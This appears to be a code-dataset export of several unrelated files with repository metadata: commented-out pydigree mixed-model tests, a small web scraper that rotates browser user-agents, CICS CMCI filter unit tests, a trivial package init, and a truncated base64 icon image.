"Apache-2.0"
] | 18 | 2016-07-10T21:23:05.000Z | 2021-06-25T08:17:17.000Z | tests/test_mixedmodel.py | jameshicks/pydigree | b268402b14b053d899443ff5ef86aea319d2614b | [
"Apache-2.0"
] | 3 | 2017-11-13T18:58:56.000Z | 2020-02-05T21:55:59.000Z | tests/test_mixedmodel.py | jameshicks/pydigree | b268402b14b053d899443ff5ef86aea319d2614b | [
"Apache-2.0"
] | 6 | 2019-04-16T08:08:53.000Z | 2021-05-24T17:29:43.000Z |
import os
import numpy as np
import pydigree as pyd
from scipy.optimize import check_grad
from pydigree.stats.mixedmodel.mixedmodel import make_incidence_matrix
from pydigree.stats.mixedmodel import MixedModel
from pydigree.stats.mixedmodel.likelihood import ML, REML
testdir = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'test_data',
'h2test')
# A dataset simulated to have population h2 = 50%
# Evaluated by SOLAR to have h2 = 45.92%
pedigree_file = os.path.join(testdir, 'h2test.pedigrees')
phenotype_file = os.path.join(testdir, 'h2test.csv')
solar_h2 = 0.4592420
# def test_make_incidence_matrix():
# phenlab = 'testvar'
# inds = [pyd.Individual(None, i) for i in range(6)]
# phens = [1,2,3,1,2,3]
# for ind, phen in zip(inds, phens):
# ind.phenotypes[phenlab] = phen
# observed = make_incidence_matrix(inds, phenlab)
# expected = np.array([1,0,0,0,1,0,0,0,1] * 2).reshape(-1,3)
# assert (observed==expected).all()
# def makemm():
# peds = pyd.io.read_ped(pedigree_file)
# pyd.io.read_phenotypes(peds, phenotype_file)
# mm = MixedModel(peds, outcome='synthetic')
# mm.add_genetic_effect()
# return mm
# def test_reml_gradient():
# model = makemm()
# model.fit_model()
# lik = REML(model, info='newton')
# def grad(params):
# lik.set_parameters(params)
# return lik.gradient()
# def func(params):
# lik.set_parameters(params)
# return lik.loglikelihood()
# diff = check_grad(func, grad, [.5, .5])
# assert diff < 0.001
# assert check_grad(func, grad, [0.2, 0.8]) < 0.001
# assert check_grad(func, grad, [0.8, 0.2]) < 0.001
# assert check_grad(func, grad, [0.0, 1.0]) < 0.001
# assert check_grad(func, grad, [10, 20]) < 0.001
# def test_ml_gradient():
# model = makemm()
# model.fit_model()
# lik = REML(model, info='newton')
# def grad(params):
# lik.set_parameters(params)
# return lik.gradient()
# def func(params):
# lik.set_parameters(params)
# return lik.loglikelihood()
# diff = check_grad(func, grad, [.5, .5])
# assert diff < 0.001
# assert check_grad(func, grad, [0.2, 0.8]) < 0.001
# assert check_grad(func, grad, [0.8, 0.2]) < 0.001
# assert check_grad(func, grad, [0.0, 1.0]) < 0.001
# assert check_grad(func, grad, [10, 20]) < 0.001
# def test_reml_hessian():
# model = makemm()
# model.fit_model()
# lik = REML(model, info='newton')
# def hessian(params):
# lik.set_parameters(params)
# return lik.reml_hessian()
# def func(params):
# lik.set_parameters(params)
# return lik.loglikelihood()
# testpoint = np.array([0.5, 0.5])
# real_hess = hessian(testpoint)
# test_hess = approx_hessian(testpoint, func)
# diff = (test_hess - real_hess)
# assert np.abs(diff).sum() < 0.001
# def test_ml_hessian():
# model = makemm()
# model.fit_model()
# lik = ML(model, info='newton')
# def hessian(params):
# lik.set_parameters(params)
# return lik.ml_hessian()
# def func(params):
# lik.set_parameters(params)
# return lik.loglikelihood()
# testpoint = np.array([0.5, 0.5])
# real_hess = hessian(testpoint)
# test_hess = approx_hessian(testpoint, func, epsilon=.000001)
# diff = (test_hess - real_hess)
# assert np.abs(diff).sum() < 0.001
# def test_ml_newton():
# model = makemm()
# model.maximize(method='NR', restricted=False)
# total_var = sum(model.variance_components)
# # Allow a deviation up to 5 percentage points
# assert (model.variance_components[-2]/total_var - solar_h2) < 0.05
# def test_ml_fisher():
# model = makemm()
# model.maximize(method='FS', restricted=False)
# total_var = sum(model.variance_components)
# # Allow a deviation up to 5 percentage points
# assert (model.variance_components[-2]/total_var - solar_h2) < 0.05
# def test_ml_ai():
# model = makemm()
# model.maximize(method='AI', restricted=False)
# total_var = sum(model.variance_components)
# # Allow a deviation up to 5 percentage points
# assert (model.variance_components[-2]/total_var - solar_h2) < 0.05
# def test_reml_fisher():
# model = makemm()
# model.maximize(method='FS', restricted=True)
# total_var = sum(model.variance_components)
# # Allow a deviation up to 5 percentage points
# assert (model.variance_components[-2]/total_var - solar_h2) < 0.05
# def test_reml_newton():
# model = makemm()
# model.maximize(method='NR', restricted=True)
# total_var = sum(model.variance_components)
# # Allow a deviation up to 5 percentage points
# assert (model.variance_components[-2]/total_var - solar_h2) < 0.05
# def test_reml_ai():
# model = makemm()
# model.maximize(method='AI', restricted=True)
# total_var = sum(model.variance_components)
# # Allow a deviation up to 5 percentage points
# assert (model.variance_components[-2]/total_var - solar_h2) < 0.05
# def test_reml_em():
# model = makemm()
# model.maximize(method='EM', restricted=True)
# total_var = sum(model.variance_components)
# # Allow a deviation up to 5 percentage points
# assert (model.variance_components[-2]/total_var - solar_h2) < 0.05 | 29.692308 | 74 | 0.638601 | 740 | 5,404 | 4.510811 | 0.177027 | 0.033553 | 0.096465 | 0.050929 | 0.763331 | 0.751049 | 0.734871 | 0.722588 | 0.656681 | 0.656681 | 0 | 0.042437 | 0.219467 | 5,404 | 182 | 75 | 29.692308 | 0.748933 | 0.84567 | 0 | 0 | 0 | 0 | 0.058239 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.538462 | 0 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1539f694a3b3a43a5fcfc894b1bcbcd84a516faf | 1,688 | py | Python | scrapegoat.py | edintronics/scrapegoat | 2ab98be6b33b61dabb5ff3c26f03645facbed9b8 | [
"MIT"
] | null | null | null | scrapegoat.py | edintronics/scrapegoat | 2ab98be6b33b61dabb5ff3c26f03645facbed9b8 | [
"MIT"
] | null | null | null | scrapegoat.py | edintronics/scrapegoat | 2ab98be6b33b61dabb5ff3c26f03645facbed9b8 | [
"MIT"
] | null | null | null | from bs4 import BeautifulSoup
import urllib2
import random
# IE10 - Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
# Chrome - Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
# Chrome (WinV2) - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
# Safari iOS10 - Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1
# GSA on iOS10 - Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/22.0.141836113 Mobile/14C92 Safari/600.1.4
class Goat:
"""Tell the goat which pasture to graze and it returns with a pot of soup"""
def __init__(self,pasture):
self.hats =["Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1",
"Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/22.0.141836113 Mobile/14C92 Safari/600.1.4"]
self.food = BeautifulSoup(urllib2.urlopen(urllib2.Request(pasture,headers={"user-agent":self.putHatOn()})),"html.parser")
def putHatOn(self):
return self.hats[random.randrange(0,5)]
| 64.923077 | 158 | 0.697867 | 301 | 1,688 | 3.887043 | 0.275748 | 0.068376 | 0.076923 | 0.05641 | 0.731624 | 0.731624 | 0.731624 | 0.731624 | 0.731624 | 0.731624 | 0 | 0.173023 | 0.161137 | 1,688 | 25 | 159 | 67.52 | 0.653249 | 0.418246 | 0 | 0 | 0 | 0.384615 | 0.604938 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.230769 | 0.076923 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
15a7115317af03c37e736518222a4e86240c0344 | 13,856 | py | Python | tests/unit/modules/test_cmci_filters.py | ind1go/ibm_zos_cics | e56145750b45cf085a0d25062ea711d028bed0da | [
"Apache-2.0"
] | null | null | null | tests/unit/modules/test_cmci_filters.py | ind1go/ibm_zos_cics | e56145750b45cf085a0d25062ea711d028bed0da | [
"Apache-2.0"
] | null | null | null | tests/unit/modules/test_cmci_filters.py | ind1go/ibm_zos_cics | e56145750b45cf085a0d25062ea711d028bed0da | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) IBM Corporation 2020
# Apache License, Version 2.0 (see https://opensource.org/licenses/Apache-2.0)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from ansible_collections.ibm.ibm_zos_cics.plugins.modules import cmci_get
from ansible_collections.ibm.ibm_zos_cics.tests.unit.helpers.cmci_helper import (
HOST, PORT, CONTEXT, SCOPE, AnsibleFailJson,
set_module_args, exit_json, fail_json, cmci_module, CMCITestHelper
)
from ansible.module_utils import basic
import pytest
import re
from collections import OrderedDict
def test_query_criteria(cmci_module): # type: (CMCITestHelper) -> None
records = [{'name': 'bat', 'dsname': 'STEWF.BLOP.BLIP'}]
cmci_module.stub_records('GET', 'cicslocalfile', records, scope=SCOPE, parameters='?CRITERIA=%28FOO%3D%27BAR%27%29')
cmci_module.expect(result(
'https://winmvs2c.hursley.ibm.com:26040/CICSSystemManagement/'
'cicslocalfile/CICSEX56/IYCWEMW2?CRITERIA=%28FOO%3D%27BAR%27%29',
records=records
))
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'filter': {
'FOO': 'BAR'
}
}
})
def test_filter_multi(cmci_module): # type: (CMCITestHelper) -> None
records = [{'name': 'bat', 'dsname': 'STEWF.BLOP.BLIP'}]
filters = OrderedDict({})
filters['GOO'] = 'LAR'
filters['FOO'] = 'BAR'
cmci_module.stub_records('GET', 'cicslocalfile', records, scope=SCOPE,
parameters='?CRITERIA=%28GOO%3D%27LAR%27%29%20AND%20%28FOO%3D%27BAR%27%29')
cmci_module.expect(result(
'https://winmvs2c.hursley.ibm.com:26040/CICSSystemManagement/'
'cicslocalfile/CICSEX56/IYCWEMW2?CRITERIA=%28GOO%3D%27LAR%27%29%20AND%20%28FOO%3D%27BAR%27%29',
records=records
))
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'filter': filters
}
})
def test_complex_filter_and(cmci_module): # type: (CMCITestHelper) -> None
records = [{'name': 'bat', 'dsname': 'STEWF.BLOP.BLIP'}]
cmci_module.stub_records('GET', 'cicslocalfile', records, scope=SCOPE,
parameters='?CRITERIA=%28FOO%3D%27BAR%27%29%20AND%20%28GOO%3D%27LAR%27%29')
cmci_module.expect(result(
'https://winmvs2c.hursley.ibm.com:26040/CICSSystemManagement/'
'cicslocalfile/CICSEX56/IYCWEMW2?CRITERIA=%28FOO%3D%27BAR%27%29%20AND%20%28GOO%3D%27LAR%27%29',
records=records
))
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'complex_filter': {
'and': [{
'attribute': 'FOO',
'operator': '=',
'value': 'BAR'
}, {
'attribute': 'GOO',
'operator': '=',
'value': 'LAR'
}]
}
}
})
def test_complex_filter_or(cmci_module): # type: (CMCITestHelper) -> None
records = [{'name': 'bat', 'dsname': 'STEWF.BLOP.BLIP'}]
cmci_module.stub_records('GET', 'cicslocalfile', records, scope=SCOPE,
parameters='?CRITERIA=%28FOO%3D%27BAR%27%29%20OR%20%28GOO%3D%27LAR%27%29')
cmci_module.expect(result(
'https://winmvs2c.hursley.ibm.com:26040/CICSSystemManagement/'
'cicslocalfile/CICSEX56/IYCWEMW2?CRITERIA=%28FOO%3D%27BAR%27%29%20OR%20%28GOO%3D%27LAR%27%29',
records=records
))
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'complex_filter': {
'or': [{
'attribute': 'FOO',
'operator': '=',
'value': 'BAR'
}, {
'attribute': 'GOO',
'operator': '=',
'value': 'LAR'
}]
}
}
})
def test_complex_filter_operator(cmci_module): # type: (CMCITestHelper) -> None
records = [{'name': 'bat', 'dsname': 'STEWF.BLOP.BLIP'}]
cmci_module.stub_records('GET', 'cicslocalfile', records, scope=SCOPE,
parameters='?CRITERIA=%28NOT%28FOO%3D%3D%27BAR%27%29%29')
cmci_module.expect(result(
'https://winmvs2c.hursley.ibm.com:26040/CICSSystemManagement/'
'cicslocalfile/CICSEX56/IYCWEMW2?CRITERIA=%28NOT%28FOO%3D%3D%27BAR%27%29%29',
records=records
))
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'complex_filter': {
'attribute': 'FOO',
'operator': '!=',
'value': 'BAR'
}
}
})
def test_complex_filter_and_or(cmci_module): # type: (CMCITestHelper) -> None
records = [{'name': 'bat', 'dsname': 'STEWF.BLOP.BLIP'}]
cmci_module.stub_records('GET', 'cicslocalfile', records, scope=SCOPE,
parameters='?CRITERIA=%28FOO%3D%27BAR%27%29%20AND%20%28BAT%3D%27BAZ%27%29%20AND%20%28'
'%28BING%3D%271%27%29%20OR%20%28BING%3D%272%27%29%29')
cmci_module.expect(result(
'https://winmvs2c.hursley.ibm.com:26040/CICSSystemManagement/'
'cicslocalfile/CICSEX56/IYCWEMW2?CRITERIA=%28FOO%3D%27BAR%27%29%20AND%20%28BAT%3D%27BAZ%27%29%20AND%20%28'
'%28BING%3D%271%27%29%20OR%20%28BING%3D%272%27%29%29',
records=records
))
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'complex_filter': {
'and': [{
'attribute': 'FOO',
'value': 'BAR'
}, {
'attribute': 'BAT',
'value': 'BAZ'
}, {
'or': [{
'attribute': 'BING',
'operator': '=',
'value': '1'
}, {
'attribute': 'BING',
'value': '2'
}]
}]
}
}
})
def test_complex_filter_and_and(cmci_module): # type: (CMCITestHelper) -> None
records = [{'name': 'bat', 'dsname': 'STEWF.BLOP.BLIP'}]
cmci_module.stub_records('GET', 'cicslocalfile', records, scope=SCOPE,
parameters='?CRITERIA=%28FOO%3D%27BAR%27%29%20AND%20%28BAT%3D%3D%27BAZ%27%29%20AND%20%28'
'%28BING%3D%271%27%29%20AND%20%28BING%3D%272%27%29%29')
cmci_module.expect(result(
'https://winmvs2c.hursley.ibm.com:26040/CICSSystemManagement/'
'cicslocalfile/CICSEX56/IYCWEMW2?CRITERIA=%28FOO%3D%27BAR%27%29%20AND%20%28BAT%3D%3D%27BAZ%27%29%20AND%20%28'
'%28BING%3D%271%27%29%20AND%20%28BING%3D%272%27%29%29',
records=records
))
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'complex_filter': {
'and': [{
'attribute': 'FOO',
'value': 'BAR'
}, {
'attribute': 'BAT',
'operator': '==',
'value': 'BAZ'
}, {
'and': [{
'attribute': 'BING',
'value': '1'
}, {
'attribute': 'BING',
'value': '2'
}]
}]
}
}
})
def test_complex_filter_or_or(cmci_module): # type: (CMCITestHelper) -> None
records = [{'name': 'bat', 'dsname': 'STEWF.BLOP.BLIP'}]
cmci_module.stub_records('GET', 'cicslocalfile', records, scope=SCOPE,
parameters='?CRITERIA=%28FOO%3E%3D%27BAR%27%29%20OR%20%28%28BING%3D%3D%271%27%29%20OR%20'
'%28BING%3D%272%27%29%29')
cmci_module.expect(result(
'https://winmvs2c.hursley.ibm.com:26040/CICSSystemManagement/'
'cicslocalfile/CICSEX56/IYCWEMW2?CRITERIA=%28FOO%3E%3D%27BAR%27%29%20OR%20%28%28BING%3D%3D%271%27%29%20OR%20'
'%28BING%3D%272%27%29%29',
records=records
))
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'complex_filter': {
'or': [{
'attribute': 'FOO',
'operator': '>=',
'value': 'BAR'
}, {
'or': [{
'attribute': 'BING',
'operator': 'IS',
'value': '1'
}, {
'attribute': 'BING',
'operator': 'EQ',
'value': '2'
}]
}]
}
}
})
def test_complex_filter_invalid_and_or_combo(cmci_module): # type: (CMCITestHelper) -> None
cmci_module.expect({
'msg': 'parameters are mutually exclusive: attribute|and|or found in resources -> complex_filter',
'failed': True
})
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'complex_filter': {
'and': [{
'attribute': 'FOO',
'operator': '=',
'value': 'BAR'
}, {
'attribute': 'GOO',
'operator': '=',
'value': 'LAR'
}],
'or': [{
'attribute': 'FOO',
'operator': '=',
'value': 'BAR'
}, {
'attribute': 'GOO',
'operator': '=',
'value': 'LAR'
}]
}
}
})
def test_query_criteria_complex_filter_no_value(cmci_module):
cmci_module.expect({
'msg': 'parameters are required together: attribute, value found in resources -> complex_filter -> and',
'failed': True
})
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'complex_filter': {
'and': [{
'attribute': 'FOO'
}, {
'attribute': 'BAR',
'value': 'BOO'
}]
}
}
})
def test_complex_filter_operator_letters(cmci_module): # type: (CMCITestHelper) -> None
records = [{'name': 'bat', 'dsname': 'STEWF.BLOP.BLIP'}]
cmci_module.stub_records('GET', 'cicslocalfile', records, scope=SCOPE, parameters='?CRITERIA=%28FOO%3E%27BAR%27%29')
cmci_module.expect(result(
'https://winmvs2c.hursley.ibm.com:26040/CICSSystemManagement/'
'cicslocalfile/CICSEX56/IYCWEMW2?CRITERIA=%28FOO%3E%27BAR%27%29',
records=records
))
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'complex_filter': {
'attribute': 'FOO',
'operator': 'GT',
'value': 'BAR'
}
}
})
def test_complex_filter_invalid_and_attribute(cmci_module): # type: (CMCITestHelper) -> None
cmci_module.expect({
'msg': 'parameters are mutually exclusive: attribute|and|or, and|value found in resources -> complex_filter',
'failed': True
})
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'complex_filter': {
'and': [{
'attribute': 'FOO',
'value': 'BAR'
}, {
'attribute': 'BAT',
'operator': '==',
'value': 'BAZ'
}],
'attribute': 'FOO2',
'value': 'BAR2'
}
}
})
def result(url, records, http_status='OK', http_status_code=200):
return {
'changed': False,
'connect_version': '0560',
'cpsm_reason': '',
'cpsm_reason_code': 0,
'cpsm_response': 'OK',
'cpsm_response_code': 1024,
'http_status': http_status,
'http_status_code': http_status_code,
'record_count': len(records),
'records': records,
'request': {
'url': url,
'method': 'GET',
'body': None
}
}
| 32.602353 | 120 | 0.494298 | 1,286 | 13,856 | 5.178072 | 0.122084 | 0.069079 | 0.024328 | 0.02643 | 0.85193 | 0.842319 | 0.816339 | 0.805827 | 0.805827 | 0.80012 | 0 | 0.069319 | 0.352411 | 13,856 | 424 | 121 | 32.679245 | 0.672796 | 0.034209 | 0 | 0.710027 | 0 | 0.04607 | 0.342934 | 0.116331 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03523 | false | 0 | 0.01897 | 0.00271 | 0.056911 | 0.00271 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ec8134649bf79e71238a7e36058ba48de1027f16 | 29 | py | Python | notecomputer/__init__.py | notechats/notepad | aa80e0621f42f34e3db48890e1756fd52695a022 | [
"Apache-2.0"
] | null | null | null | notecomputer/__init__.py | notechats/notepad | aa80e0621f42f34e3db48890e1756fd52695a022 | [
"Apache-2.0"
] | null | null | null | notecomputer/__init__.py | notechats/notepad | aa80e0621f42f34e3db48890e1756fd52695a022 | [
"Apache-2.0"
] | null | null | null | print("import notecomputer")
| 14.5 | 28 | 0.793103 | 3 | 29 | 7.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068966 | 29 | 1 | 29 | 29 | 0.851852 | 0 | 0 | 0 | 0 | 0 | 0.655172 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 8 |
ec9a148216957deefe3a7d8ce83eed11960c3089 | 24,847 | py | Python | xtools/icon.py | hxler123/tools | 57687a86375354705cdbbeec0086b99ac5d4cfbb | [
"MIT"
] | 2 | 2020-09-22T08:10:19.000Z | 2021-02-25T11:40:19.000Z | xtools/icon.py | hxler123/tools | 57687a86375354705cdbbeec0086b99ac5d4cfbb | [
"MIT"
] | null | null | null | xtools/icon.py | hxler123/tools | 57687a86375354705cdbbeec0086b99ac5d4cfbb | [
"MIT"
] | null | null | null | base64_img = """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